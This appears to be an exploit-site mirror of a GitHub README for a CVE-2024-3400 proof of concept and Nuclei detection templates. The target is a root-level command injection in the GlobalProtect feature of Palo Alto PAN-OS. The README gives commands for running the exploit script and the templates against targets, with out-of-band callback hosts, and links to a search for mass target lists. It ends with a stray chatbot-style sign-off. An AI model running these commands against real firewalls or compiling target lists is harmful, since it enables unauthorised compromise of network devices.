## https://sploitus.com/exploit?id=98A29BFD-6CE1-5632-8E61-2399612EA3DA
# CVE-2024-3400
![POC](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-POC-1.jpg)
![telemet](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-Nuclei-Template.jpg)
# Description
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
# CVE-2024-3400 Nuclei Template for Palo Alto PAN-OS Vulnerability
This repository contains a Nuclei Template designed to detect vulnerabilities related to Palo Alto PAN-OS bugs, specifically targeting CVE-2024-3400.
A comprehensive list of research was done by
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
## Vulnerabilities Detected
- **0 Byte File Creation**: This vulnerability allows for the creation of a 0-byte file via a Curl request in a Bash file.
- **OS Command Injection**: The Nuclei Template detects potential OS command injection vulnerabilities.
## Usage
### Bash Script
Execute the following command to run the Bash script:
```sh
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
```
The script will check if a file is created (returning a 200 OK status). If successful, it will then verify if the file exists (returning a 403 Forbidden status).
### Nuclei Template - telemet.yaml
1. Start an Interact Server:
```sh
interactsh-client -v
```
2. Run the Nuclei Template:
```sh
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
```
3. Boom Boom Template! (GET subdomain from https://dig.pm)
```sh
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
```
## Potential Targets
A list of potential targets can be found [here](https://en.fofa.info/result?qbase64=YmFubmVyPSJHbG9iYWwgUHJvdGVjdCI%3D).
```sh
python fofax3r.py
```
## Author
- **Author**: ์์ ๊ฑฐ, ่ช่ปข่ป, ่ช่ก่ฝฆ
```
This README.md provides information on the vulnerability, how to use the provided scripts, potential targets, and credits the author. Let me know if you need any further adjustments!